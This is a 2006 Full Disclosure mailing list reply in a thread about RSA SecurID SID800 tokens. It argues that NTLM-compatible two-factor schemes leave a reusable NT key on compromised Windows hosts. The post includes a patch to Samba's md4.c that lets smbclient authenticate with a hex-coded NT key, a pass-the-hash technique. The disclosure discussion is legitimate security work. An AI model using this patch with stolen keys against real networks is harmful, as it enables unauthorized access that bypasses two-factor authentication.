Full Disclosure mailing list archives
Re[3]: RSA SecurID SID800 Token vulnerable by design
From: 3APA3A <3APA3A () SECURITY NNOV RU>
Date: Mon, 11 Sep 2006 18:55:26 +0400
Dear Brian Eaton, --Saturday, September 9, 2006, 6:12:31 PM, you wrote to 3APA3A () security nnov ru: BE> For web SSO in particular, accessing the token once is nearly as good BE> as accessing it constantly. The token will be used for the initial BE> authentication, but normally a cookie will be used for session BE> tracking. An attacker who can sniff the token code can certainly BE> steal the cookie as well. BE> Two-factor auth cannot be said to make accessing the network from a BE> compromised PC "safe". That does not make two-factor auth useless. BE> With plain passwords, once the attacker has the password, they can BE> access the network at will. With two-factor auth, they can access BE> the network for a much more limited time span. Network is compromised as long as attacker keeps control under compromised host regardless of authentication. And sometimes longer. At least for some 2-factor authentication schemas implementations under Windows (I'm not sure about this very implementation) situation may not significantly different from Web-based scenario. For compatibility with NTLM authentication user's extended credentials are simply mapped to his account and it's possible to connect to network using user's NT key. In standard Windows environment NT key is derived from password. For extended authentication schema it can be set to some random value. NT key is stored in memory of compromised host and thus can be extracted. An example patch for SAMBA smbclient to use hex-coded NT key instead of password : --- md4.c.orig 2004-04-04 11:37:00.000000000 +0400 +++ md4.c 2004-10-27 23:01:31.000000000 +0400 @@ -130,6 +130,21 @@ C = 0x98badcfe; D = 0x10325476; + + if(n == 64){ + int j; + unsigned char * hexd = (unsigned char *)"0123456789ABCDEF"; + for(j = 0; j<16; j++){ + if(!strchr(hexd, in[(j<<2)]))break; + if(in[(j<<2)+1])break; + if(!strchr(hexd, in[(j<<2)+2]))break; + if(in[(j<<2)+3])break; + out[j] = ((strchr(hexd, in[(j<<2)]) - (char *)hexd)<<4); + out[j] ^= (strchr(hexd, in[(j<<2)+2]) - (char *)hexd); + } + if(j == 16) return; + } + while (n > 64) { copy64(M, in); mdfour64(M); It means, if authentication schema is NTLM-compatible (it must be for compatibility with pre-Windows 2000 hosts and some network applications, like Outlook Express), attacker can use compromised account to access network resources without having access to 2-factor authentication device. How long he can retain this access depends on how often account's NT key is changed (usually with password change, but actually depends on implementation of authentication system and may be never). -- ~/ZARAZA http://www.security.nnov.ru/ _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- RSA SecurID SID800 Token vulnerable by design Hadmut Danisch (Sep 07)
- Re: RSA SecurID SID800 Token vulnerable by design Matthew Leeds (Sep 08)
- Re: RSA SecurID SID800 Token vulnerable by design Bojan Zdrnja (Sep 08)
- Re: RSA SecurID SID800 Token vulnerable by design 3APA3A (Sep 09)
- Re: Re: RSA SecurID SID800 Token vulnerable by design Brian Eaton (Sep 09)
- Re[3]: RSA SecurID SID800 Token vulnerable by design 3APA3A (Sep 11)
- Re: Re[3]: RSA SecurID SID800 Token vulnerable by design Brian Eaton (Sep 11)
- Re[5]: RSA SecurID SID800 Token vulnerable by design 3APA3A (Sep 11)
- Re: Re: Re[3]: RSA SecurID SID800 Token vulnerable by design 3APA3A (Sep 11)
- Re: Re: RSA SecurID SID800 Token vulnerable by design Brian Eaton (Sep 09)
- Re: RSA SecurID SID800 Token vulnerable by design Bojan Zdrnja (Sep 09)
- RE: Re: RSA SecurID SID800 Token vulnerable by design Lyal Collins (Sep 09)
- Re: Re: RSA SecurID SID800 Token vulnerable by design Brian Eaton (Sep 09)
- Re: Re: RSA SecurID SID800 Token vulnerable by design Bojan Zdrnja (Sep 11)
- Re[2]: RSA SecurID SID800 Token vulnerable by design 3APA3A (Sep 11)
- <Possible follow-ups>
- RE: RSA SecurID SID800 Token vulnerable by design Gaidosch, Tamas (Sep 11)